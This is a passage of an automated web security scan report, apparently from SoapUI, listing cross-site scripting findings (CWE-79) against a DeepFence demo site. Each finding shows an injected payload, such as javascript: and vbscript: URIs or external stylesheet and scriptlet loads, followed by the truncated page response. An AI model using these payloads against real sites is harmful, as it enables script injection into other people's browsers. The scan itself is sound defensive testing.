href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #257\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG DYNSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #258\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG LOWSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #259\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# <BGSOUND SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #260\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BR SIZE=\"&{alert('XSS')}\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the responseCWE-ID CWE-79\nIssue Number #261\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <LAYER SRC=\"http://soapui.org/scriptlet.html\"></LAYER\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #262\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #263\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <LINK REL=\"stylesheet\" HREF=\"http://soapui.org/xss.css\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #264\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>@import'http://soapui.org/xss.css';</STYLE\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #265\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"Link\" Content=\"<http://soapui.org/\nxss.css>; REL=stylesheet\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #266\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>BODY{-moz-binding:url(\"http://soapui.org/\nxssmoz.xml#xss\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #267\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <XSS STYLE=\"behavior: url(xss.htc);\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #268\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</\nSTYLE><UL><LI>XSS\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #269\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC='vbscript:msgbox(\"XSS\")'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #270\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"mocha:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 